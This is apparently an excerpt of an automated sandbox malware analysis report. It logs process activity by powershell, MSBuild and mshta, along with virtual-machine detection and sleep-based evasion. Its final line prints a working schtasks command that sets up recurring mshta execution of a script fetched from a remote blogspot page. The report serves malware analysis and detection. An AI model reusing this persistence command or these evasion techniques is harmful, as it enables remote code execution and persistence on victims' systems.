              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
              Source: C:\Windows\System32\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
              Source: C:\Windows\System32\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 1949
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 7788
              Source: C:\Windows\System32\mshta.exe TID: 2732Thread sleep time: -480000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 852Thread sleep time: -240000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2252Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\taskeng.exe TID: 2400Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\mshta.exe TID: 1916Thread sleep time: -120000s >= -30000s
              Source: C:\Windows\System32\mshta.exe TID: 2112Thread sleep time: -420000s >= -30000s
              Source: C:\Windows\System32\mshta.exe TID: 2376Thread sleep time: -120000s >= -30000s
              Source: C:\Windows\System32\taskkill.exe TID: 1532Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\taskkill.exe TID: 1532Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3048Thread sleep time: -360000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2284Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\taskkill.exe TID: 3068Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\taskkill.exe TID: 3068Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2372Thread sleep time: -420000s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1144Thread sleep time: -420000s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2092Thread sleep time: -8301034833169293s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2092Thread sleep time: -120000s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2340Thread sleep count: 1949 > 30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2340Thread sleep count: 7788 > 30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2092Thread sleep count: 94 > 30
              Source: C:\Windows\System32\mshta.exe TID: 2440Thread sleep time: -120000s >= -30000s
              Source: C:\Windows\System32\mshta.exe TID: 1988Thread sleep time: -480000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2804Thread sleep time: -360000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1068Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\mshta.exe TID: 1900Thread sleep time: -120000s >= -30000s
              Source: C:\Windows\System32\mshta.exe TID: 3036Thread sleep time: -540000s >= -30000s
              Source: C:\Windows\System32\mshta.exe TID: 2560Thread sleep time: -120000s >= -30000s
              Source: C:\Windows\System32\mshta.exe TID: 2744Thread sleep time: -300000s >= -30000s
              Source: C:\Windows\System32\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_01D8096A GetSystemInfo,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
              Source: mshta.exe, 00000011.00000002.2222610577.00000000005BA000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\mshta.exeMemory protected: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Creates a scheduled task launching mshta.exe (likely to bypass HIPS)Show sources
              Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
